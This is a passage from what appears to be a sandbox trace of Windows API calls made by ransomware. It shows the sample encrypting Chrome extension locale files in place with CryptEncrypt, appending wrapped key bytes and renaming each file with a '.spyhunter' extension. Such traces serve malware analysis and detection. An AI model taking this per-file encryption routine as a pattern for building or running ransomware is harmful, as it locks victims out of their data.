lpOverlapped=0x0 | out: lpBuffer=0x57f414*, lpNumberOfBytesWritten=0x57f3d4*=0x4, lpOverlapped=0x0) returned 1 [0137.361] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3d4*=0x30, lpOverlapped=0x0) returned 1 [0137.361] CloseHandle (hObject=0x18c) returned 1 [0137.362] GetProcessHeap () returned 0x2c0000 [0137.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.362] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.spyhunter") returned 165 [0137.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0137.363] GetProcessHeap () returned 0x2c0000 [0137.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.363] GetProcessHeap () returned 0x2c0000 [0137.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.363] GetProcessHeap () returned 0x2c0000 [0137.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d870 | out: hHeap=0x2c0000) returned 1 [0137.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f410 | out: pbBuffer=0x57f410) returned 1 [0137.364] GetProcessHeap () returned 0x2c0000 [0137.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f408*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f408*=0x30) returned 1 [0137.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json") returned 155 [0137.365] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.365] GetProcessHeap () returned 0x2c0000 [0137.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.365] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3cc*=0xcf, lpOverlapped=0x0) returned 1 [0137.366] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.366] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x57f3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3cc*=0xcf, lpOverlapped=0x0) returned 1 [0137.366] GetProcessHeap () returned 0x2c0000 [0137.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.366] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.366] WriteFile (in: hFile=0x18c, lpBuffer=0x57f40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3cc, lpOverlapped=0x0 | out: lpBuffer=0x57f40c*, lpNumberOfBytesWritten=0x57f3cc*=0x4, lpOverlapped=0x0) returned 1 [0137.366] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3cc*=0x30, lpOverlapped=0x0) returned 1 [0137.366] CloseHandle (hObject=0x18c) returned 1 [0137.366] GetProcessHeap () returned 0x2c0000 [0137.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.366] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.spyhunter") returned 165 [0137.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0137.367] GetProcessHeap () returned 0x2c0000 [0137.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.367] GetProcessHeap () returned 0x2c0000 [0137.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.367] GetProcessHeap () returned 0x2c0000 [0137.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d6e8 | out: hHeap=0x2c0000) returned 1 [0137.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f408 | out: pbBuffer=0x57f408) returned 1 [0137.402] GetProcessHeap () returned 0x2c0000 [0137.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f400*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f400*=0x30) returned 1 [0137.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json") returned 155 [0137.402] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.402] GetProcessHeap () returned 0x2c0000 [0137.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.403] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3c4*=0x14b, lpOverlapped=0x0) returned 1 [0137.403] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffeb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.403] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x14b, lpNumberOfBytesWritten=0x57f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3c4*=0x14b, lpOverlapped=0x0) returned 1 [0137.404] GetProcessHeap () returned 0x2c0000 [0137.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.404] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.404] WriteFile (in: hFile=0x18c, lpBuffer=0x57f404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3c4, lpOverlapped=0x0 | out: lpBuffer=0x57f404*, lpNumberOfBytesWritten=0x57f3c4*=0x4, lpOverlapped=0x0) returned 1 [0137.404] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3c4*=0x30, lpOverlapped=0x0) returned 1 [0137.404] CloseHandle (hObject=0x18c) returned 1 [0137.404] GetProcessHeap () returned 0x2c0000 [0137.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.404] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.spyhunter") returned 165 [0137.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\messages.json.spyhunter")) returned 1 [0137.405] GetProcessHeap () returned 0x2c0000 [0137.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.405] GetProcessHeap () returned 0x2c0000 [0137.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.405] GetProcessHeap () returned 0x2c0000 [0137.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d560 | out: hHeap=0x2c0000) returned 1 [0137.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f400 | out: pbBuffer=0x57f400) returned 1 [0137.408] GetProcessHeap () returned 0x2c0000 [0137.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f3f8*=0x30) returned 1 [0137.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json") returned 155 [0137.409] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.409] GetProcessHeap () returned 0x2c0000 [0137.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.409] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3bc*=0x114, lpOverlapped=0x0) returned 1 [0137.410] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffeec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.410] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x57f3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3bc*=0x114, lpOverlapped=0x0) returned 1 [0137.410] GetProcessHeap () returned 0x2c0000 [0137.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.410] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.410] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3bc, lpOverlapped=0x0 | out: lpBuffer=0x57f3fc*, lpNumberOfBytesWritten=0x57f3bc*=0x4, lpOverlapped=0x0) returned 1 [0137.410] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3bc*=0x30, lpOverlapped=0x0) returned 1 [0137.410] CloseHandle (hObject=0x18c) returned 1 [0137.410] GetProcessHeap () returned 0x2c0000 [0137.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.410] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.spyhunter") returned 165 [0137.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0137.411] GetProcessHeap () returned 0x2c0000 [0137.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.411] GetProcessHeap () returned 0x2c0000 [0137.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.411] GetProcessHeap () returned 0x2c0000 [0137.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6cf40 | out: hHeap=0x2c0000) returned 1 [0137.412] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3f8 | out: pbBuffer=0x57f3f8) returned 1 [0137.412] GetProcessHeap () returned 0x2c0000 [0137.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.413] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f3f0*=0x30) returned 1 [0137.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.413] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0137.413] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.413] GetProcessHeap () returned 0x2c0000 [0137.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.413] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3b4*=0xa7, lpOverlapped=0x0) returned 1 [0137.415] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.415] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa7, lpNumberOfBytesWritten=0x57f3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3b4*=0xa7, lpOverlapped=0x0) returned 1 [0137.416] GetProcessHeap () returned 0x2c0000 [0137.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.416] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.416] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3b4, lpOverlapped=0x0 | out: lpBuffer=0x57f3f4*, lpNumberOfBytesWritten=0x57f3b4*=0x4, lpOverlapped=0x0) returned 1 [0137.416] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3b4*=0x30, lpOverlapped=0x0) returned 1 [0137.416] CloseHandle (hObject=0x18c) returned 1 [0137.416] GetProcessHeap () returned 0x2c0000 [0137.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.416] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.spyhunter") returned 165 [0137.416] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json.spyhunter")) returned 1 [0137.417] GetProcessHeap () returned 0x2c0000 [0137.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.417] GetProcessHeap () returned 0x2c0000 [0137.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.417] GetProcessHeap () returned 0x2c0000 [0137.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e7c0 | out: hHeap=0x2c0000) returned 1 [0137.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f3f0 | out: pbBuffer=0x57f3f0) returned 1 [0137.419] GetProcessHeap () returned 0x2c0000 [0137.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f3e8*=0x30) returned 1 [0137.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0137.420] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.420] GetProcessHeap () returned 0x2c0000 [0137.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.420] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3ac*=0xed, lpOverlapped=0x0) returned 1 [0137.421] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.421] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x57f3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3ac*=0xed, lpOverlapped=0x0) returned 1 [0137.421] GetProcessHeap () returned 0x2c0000 [0137.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.421] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.421] WriteFile (in: hFile=0x18c, lpBuffer=0x57f3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3ac, lpOverlapped=0x0 | out: lpBuffer=0x57f3ec*, lpNumberOfBytesWritten=0x57f3ac*=0x4, lpOverlapped=0x0) returned 1 [0137.421] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3ac*=0x30, lpOverlapped=0x0) returned 1 [0137.422] CloseHandle (hObject=0x18c) returned 1 [0137.422] GetProcessHeap () returned 0x2c0000 [0137.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.422] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.spyhunter") returned 165 [0137.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 